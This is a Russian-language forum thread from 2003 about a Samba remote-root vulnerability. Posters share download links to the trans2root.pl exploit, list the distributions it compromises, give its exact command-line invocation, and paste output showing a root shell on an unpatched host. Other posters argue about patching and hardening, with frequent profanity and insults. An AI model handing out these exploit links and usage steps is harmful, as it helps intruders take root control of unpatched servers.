exploit:
http://www.digitaldefense.net/labs/tools/trans2root.pl

во весело, то sendmail, то ядро, теперь вот samba, и главное ко всему есть exploit'ы, осталось найти дыры в ssh и apache, тогда будет полный порядок

to anonymous (*) (2003-04-08 11:02:41.074) А с чего вы взяли, что к ssh и Apache нет exploit'ов? :)

Там уже ничего нет!

Блин да достали уже всё баги искать - обновляться не успеваю :)

P.S. всё защищённее и защищённее !

я не понял смайлика у последнего анонимуса.. меня это все повергает в уныние просто :(

хе-хе, эксплойтик-то убрали %)

чо ноете та. ставьте патчи на ядро типа openwall или grsec, фаервольте систему, всё что можно - в jail, /bin/sh (bash итд) переименовать в чота другое итд...

после чего можете хуй забить на все эти дыры и патчиться неспеша в течении недель, а не выпучив глаза и зажав жопу через час после очередной дырки...

>и патчиться неспеша в течении недель

До кому дело есть до ваших настольных компьютеров с установленным Doom и Quake. Че вы паритесь, можете не обновляться вообще. Кому вы навиг сдались с вашими коллекциями "клубники". Сидите и не пердите.

> Кому вы навиг сдались..
мля, если бы кому сдались то и так бы сломали. а так кулкакер из ПТУ придет домой, качнет эксплойт, применит ко всей сетке в разных позах - и пиздец. у этих же, блядь, ублюдков ни мозгов, ни хуя нет.. потом ищи этого мудака еще

сраная самба... дырявее может быть только семейство bind & sendmail ;]

Ya ego uspel skachat, esli nuzhen komu mogu vilozhit

давай

весна! Все живое ищет дырки...

ok, домой приду, выложу

"До кому дело есть до ваших настольных компьютеров с установленным Doom и Quake. Че вы паритесь, можете не обновляться вообще. Кому вы навиг сдались с вашими коллекциями "клубники". Сидите и не пердите."

Не, ну надо же быть таким непроходимо тупым :(

Есле тебе через дырочку засунут rootkit? А как несчет рассылки
спама с твоего компа ? Так же твой комп неплохо подойдет как
свалка для порнухи и вареза, да и пару тулз для DoS с твоего
компа тоже могут положить.

пароли в инет опять же никто не откажется спереть.

>Есле тебе через дырочку засунут rootkit?

Да, типа крутому кулхацкеру больше делать нефиг как из милиарда компов искать и ломать именно твой. И только ради того чтобы выложить туда варез или рассылать спам. У тебе шанс что это произойдет 0.000...1 % Ты больше будешь над своими *.jpg трястись чем реально это может произойти. Тот кто напишет крутой exploit будет интересоватся в первую очередь не твоим компом на отшибе с коллекцией парнухи, а чем нибудь по серьезнее. А если ломать все и всех, то очень cкоро его exploit будет не exploit а update. И тогда exploit писатель отсосет, потратив еще дохрина времени чтобы хоть еще где-нибудь дыру найти. Так что с хорошим exploit'ом он к тебе не полезет. Типа твою тачку, по десять раз на дню всякие нихорошие хацкеры пытаются заломать. А ты реально крутой боец в дырявой майке пытаешься отстоять коллекцию порнухи на своем компе. Тоже мне www.microsoft.com

po-moemu tut sidit odno losh'e.

Прикрутил grsecurity и эксплойты перестали работать, теперь своего дебианца обновляю неспеша, чего суетиться ?

О, бля, невъзёбный бивень с транслитом вылез. По делу - а что, кто-то выставляет наружу интерфейсы с разрешенным SMB? Ну знаете..

penguin - это не тебе

anonymous (*) (2003-04-08 15:00:52.693)

молодой человек неправ в корне. Помниться какие - то перцы, занимающиеся вопросами security провели показательный эксперимент: на четыре машины поставили шляпу 6 и 7, настроили сетку, оставив все остальное по дефалту и воткнули проводок в сетевуху. Первую машину вломали через 6 часов, последнию через 88. Делаем выводы.

Короче, для тех кто в танке. Какой-нибудь очередной автоэксплойт пройдется на автомате по сетке, прощупав все извесные ему(эксплойту) дыры.

вот, юзайте на здоровье:
http://make-install.ifirst.ru/misc/trans2root.pl

Debian 3.0, samba-2.2.3a-12.1 взломать не смог
SuSE 8.1, samba-2.2.5-82 взломалась

А если окромя Самбы ничего на тачке не запущено, то хрен ли там взламывать? Какой к чёрту доступ от рута и где? По протоколу smb на расшареный ресурс? Охуеть! Дыра для долбоёбов.

онанистам-скептикам: существуют червячки, безобидные и обидные. им похрен васин ли этот домашний компик или сервак крупной конторы. сламер за полчаса по всей планете прошолся...

ну и кроме того тут думаешь только одни коллекционеры порнухи собираются? у меня на десктопе винда - для меня удобнее линуха. а в винде залогиненые консоли к десяткам серверов...

Проста самба копирует не только виндовые технологии, но и дыры :)

slackware + самба из сырцов 2.2.8 - работает
mandrake 9.0 + samba-server-2.2.7-2.1mdk.rpm - работает

slackware 9.0 + самба из сырцов 2.2.8 - работает
mandrake 9.0 + samba-server-2.2.7-2.1mdk.rpm - работает

чем дальше тем хуже,
прав был тот, кто когда-то говорил, что чем популярней становится linux тем больше в нём багов находят, скоро с linux'ом опасно в инет будет выходить

http://void.ru/cgi-bin/fget?/files/trans2root.pl

Патч на мандрейк 8.2 и больше вышел вчера

hilight

> прав был тот, кто когда-то говорил, что чем > популярней становится linux тем больше в нём > багов находят, скоро с linux'ом опасно в инет > будет выходить

C'est la vie, друг мой... И меня это радует ибо сама подобная постановка вопроса доказывает, что Linux уже не "неуловимый Джо", а реальная ОС для реальных задач. И оперативность в отлове багов - единственная возможность для Linux-community не скатиться до уровня оффтопика.

>сламер за полчаса по всей планете прошолся...

Ну что ты гонишь !!! А ? Это просто не реально! Ты хоть представляешь о чем говоришь ? Просто перебрать все IP адреса может и можно за такое время. Но их ведь не просто перебрать надо. Сканирование одного компа может занять полчаса. А весь инет, за пол часа - ты просто идиот. Попробуй набрать nmap на свой комп из под рута. И посмотри. И заткнись про весь инет за пол часа. Одно ламо - честное слово.

> Патч на мандрейк 8.2 и больше вышел вчера

а на меньше 8.2 они типа забили???
вот скоты !!!
для Debian 2.2 вон уже 3 (?) года патчи выходят,
и обновления самбы для Debian 2.2 и 3.0 тоже вчера вышли.

> а на меньше 8.2 они типа забили???

Не совсем, SNF 7.2 жив пока. А вообще они о "времени жизни" своих дистрибутивов сообщили в рассылке еще в прошлом году. Системные пакеты в 8.2 вроде как прекращаются в октябре, 9.x и MNF подольше поддерживать будут.

Мужики, а как узнать, сработал эксплойт или нет? 
[*] Using target type: linx86
[*] Listener started on port 1981
[*] Starting single shot mode...
[*] Using return address of 0xbffff3ff
И ничего больше...
samba-2.2.1a, RedHat 7.2

запускай так:
./trans2root.pl -M B -t linx86 -H localhost -h localhost

если shell получишь, то значит сработал

RH 7.2 + Samba 2.2.5 + path "Корзина" - ошибки нет

ничего не получилось --всё время ругается на несуществующий файл

> Ну что ты гонишь !!! А ? Это просто не реально! Ты хоть представляешь > о чем говоришь ? Просто перебрать все IP адреса может и можно за > такое время. Но их ведь не просто перебрать надо. Сканирование одного > компа может занять полчаса. А весь инет, за пол часа - ты просто > идиот. Попробуй набрать nmap на свой комп из под рута. И посмотри. И > заткнись про весь инет за пол часа. Одно ламо - честное слово.

Слушай лох, что такое цепная реакция знаешь ? А сканирование одного-единственного порта 139 (а не сотен портов, как делает нмап) сколько времени займет ?

Прикинь, если в каждые 5 секунд зараженный компьютер заражает другой незараженный (5 секунд просто для примера - это определение порта 139 на жертве + попытка эксплойта). Сколько будет зараженных компьютеров через полчаса? Считай 2 в степени 360 (60/5*30=360). Ну так как, полчаса много или мало ?

Карочи нифига етот эксрлоит удаленно не работает!!!

./trans2root.pl -M B -t linx86 -H 192.168.50.6 -h 192.168.50.6
[*] Using target type: linx86
[*] Listener started on port 1981
[*] Starting brute force mode...
[*] Return Address: 0xbfffe5ff
[*] Starting Shell 192.168.50.6:43182

--=[ Welcome to vlad (uid=0(root) gid=0(root) groups=65534(nogroup))

^c

[user@vlad download]$

Работает. Мандрейк 9.0 и все остальное - из коробки. НИчего не патчил.

а где патч лежит?

2неграмотный-ананист: походу ты кроме нмапа больше ничего и не знаешь, да и нмап заочно изучал. стыдно про сламера ничего не знать... я без всяких новостей в нашей сибирской дыре про него сразу узнал, когда увидел засранную сетку провайдера с подозрительными пакетами на определенный порт, а через часик "повылетали" сервера у мериканского хостера. не, они работали, но каналы были забиты напрочь. пакетлост 75% на обычном пинге это было сильно :) ну отписал заказчику, что вероятнее всего вирусы бесятся, нужно переждать. на следующий день новости подтвердили...

почитай про вирусы. они сами размножаются, а не из логова злого хакера вся планета раком загибается :)

Почему самба до сих пор работает по рутом? Пора давно развести
полномочия, как это сделали с ssh.

anonymous (*) (2003-04-08 15:00:52.693)

"А ты реально крутой боец в дырявой майке пытаешься отстоять коллекцию порнухи на своем компе."

Глупыш,на майку которую я ношу тебе долго работать придется :)
И продолжай в том же духе, пока к тебе FBI или как там у вас,
ФСБ не нагрянет.

Good luck baby.

А никто не пробовал ее допустим под nobody пускать, если все только на чтение расшарено и всем?

2sseREGa (*) (2003-04-10 05:01:32.707)

Не совсем понятно, как самба в этом случае сядет на порты. Скорее нужно патчить саму самбу, что бы после бинда выполнялся setuid

самба запускает дочерние процессы от имени подключающихся пользователей. поэтому ей нужны перманентные права r00t'а.